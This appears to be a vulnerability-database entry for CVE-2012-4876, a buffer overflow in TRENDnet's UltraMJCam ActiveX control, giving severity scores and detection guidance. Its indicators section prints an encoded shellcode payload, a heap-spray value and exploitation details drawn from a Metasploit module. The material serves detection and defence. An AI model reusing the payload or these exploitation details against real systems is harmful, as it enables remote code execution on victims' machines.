cbcvebase.
CVE-2012-4876
published 2012-09-06

CVE-2012-4876: Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute…

PriorityP265critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
71.18%
99.3th percentile
Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.

Affected

2 ranges
VendorProductVersion rangeFixed in
trendnetsecurview_wireless_internet_camera
trendnetsecurview_wireless_internet_camera_activex_control

Detection & IOCsextracted from sources · hover to see the quote

filenameUltraMJCamX.ocx
pathC:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
otherCLSID:{707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
commandOpenFileDlg(sFilter)
otherProgID:UltraMJCam.UltraMJCam.1
versionUltraMJCamX.ocx 1,1,52,18
bytes
%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570
bytes
%u0c0c%u0c0c
  • Detect ActiveX instantiation of the UltraMJCam control by its CLSID {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11} in HTML/script content, which is the trigger object for the exploit.
  • Monitor for heap-spray pattern using 0x0c0c0c0c as the nop-sled/pivot address; EDX=0x0c0c0c0c at time of exploitation is a strong indicator.
  • Presence of UltraMJCamX.ocx loaded in a browser process (iexplore.exe) combined with a call to WideCharToMultiByte with MultiByteCount=0x7532 (30002) is indicative of exploitation.
  • The Metasploit module uses SEH-based exploitation with InitialAutoRunScript 'migrate -f'; detect post-exploitation process migration from iexplore.exe shortly after ActiveX load.
  • Detect the OpenFileDlg method call with an excessively long sFilter argument (offset 0x600 / 1536+ chars) on the UltraMJCam ActiveX control.
  • Flag HTTP responses serving HTML that instantiates CLSID 707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11 alongside large JavaScript unescape() heap-spray blocks.
  • ·The exploit targets only specific IE/Windows combinations; the Metasploit module returns 404 for unsupported user-agents, so detection based solely on HTTP 404 responses from the exploit server is unreliable.
  • ·The module notes UltraMJCamX.ocx as the only application-specific component but flags it as unreliable for use as a ROP/return gadget source, so ROP-chain-based detections tied to that module may miss variants.
  • ·Null byte (0x00) is a bad character for the payload; payloads containing null bytes will not function, so signature-based detection must account for null-free shellcode encodings.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.